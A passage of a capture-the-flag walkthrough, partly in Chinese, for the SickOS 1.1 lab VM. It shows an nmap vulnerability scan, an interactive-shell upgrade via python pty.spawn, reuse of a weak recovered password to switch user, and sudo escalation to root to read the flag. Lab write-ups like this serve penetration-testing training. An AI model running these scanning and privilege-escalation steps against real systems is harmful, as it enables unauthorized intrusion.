root@kali:~# nmap -p 22,3128,8080 -A -T4 -v 192.168.66.13 --script=vuln PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0) |_clamav-exec: ERROR: Script execution failed (use -d to debug) 3128/tcp open http-proxy Squid http proxy 3.1.19 |_clamav-exec: ERROR: Script execution failed (use -d to debug) |_http-server-header: squid/3.1.19 | http-slowloris-check: | VULNERABLE: | Slowloris DOS attack | State: LIKELY VULNERABLE | IDs: CVE:CVE-2007-6750 | Slowloris tries to keep many connections to the target web server open and hold | them open as long as possible. It accomplishes this by opening connections to | the target web server and sending a partial request. By doing so, it starves | the http server's resources causing Denial Of Service. | | Disclosure date: 2009-09-17 | References: | http://ha.ckers.org/slowloris/ |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750 | vulners: | cpe:/a:squid-cache:squid:3.1.19: | CVE-2016-4054 6.8 https://vulners.com/cve/CVE-2016-4054 | CVE-2016-4052 6.8 https://vulners.com/cve/CVE-2016-4052 | CVE-2016-4051 6.8 https://vulners.com/cve/CVE-2016-4051 | CVE-2014-7142 6.4 https://vulners.com/cve/CVE-2014-7142 | CVE-2014-7141 6.4 https://vulners.com/cve/CVE-2014-7141 | CVE-2016-4556 5.0 https://vulners.com/cve/CVE-2016-4556 | CVE-2016-4555 5.0 https://vulners.com/cve/CVE-2016-4555 | CVE-2016-10002 5.0 https://vulners.com/cve/CVE-2016-10002 | CVE-2012-5643 5.0 https://vulners.com/cve/CVE-2012-5643 |_ CVE-2016-4053 4.3 https://vulners.com/cve/CVE-2016-4053 8080/tcp closed http-proxy
// Database information: // for SQLite, use sqlite:/tmp/wolf.db (SQLite 3) // The path can only be absolute path or :memory: // For more info look at: www.php.net/pdo
$ python -c 'import pty;pty.spawn("/bin/bash")' www-data@SickOs:/var/www/wolfcms$ ls ls CONTRIBUTING.md composer.json docs index.php robots.txt README.md config.php favicon.ico public wolf www-data@SickOs:/var/www/wolfcms$ su sickos su sickos Password: john@123
sickos@SickOs:/var/www/wolfcms$ id id uid=1000(sickos) gid=1000(sickos) groups=1000(sickos),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lpadmin),112(sambashare) sickos@SickOs:/var/www/wolfcms$ whoami whoami sickos sickos@SickOs:/var/www/wolfcms$ cd /root cd /root bash: cd: /root: Permission denied sickos@SickOs:/var/www/wolfcms$ sudo -s sudo -s [sudo] password for sickos: john@123
root@SickOs:/var/www/wolfcms# id id uid=0(root) gid=0(root) groups=0(root) root@SickOs:/var/www/wolfcms# whoami whoami root root@SickOs:/var/www/wolfcms# cd /root cd /root root@SickOs:/root# ls ls a0216ea4d51874464078c618298b1367.txt root@SickOs:/root# cat a0216ea4d51874464078c618298b1367.txt cat a0216ea4d51874464078c618298b1367.txt If you are viewing this!!
ROOT!
You have Succesfully completed SickOS1.1. Thanks for Trying
到此为止成功获取到了root权限并读取了flag
其它提权方法参考
2015-slickOs-1.1
write-up-sickos-1-1
vulnhub-writeup-SickOs-1-1
就是利用ShellShock漏洞和自动定时任务提权,很简单,在这里就不多做演示了
知识点总结
浏览器设置http-proxy Squid http proxy代理访问
弱口令
文件上传
用户值为1000:1000-第一用户提权
Game over
不好意思,这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本,i am so sorry about this…It’s a pity…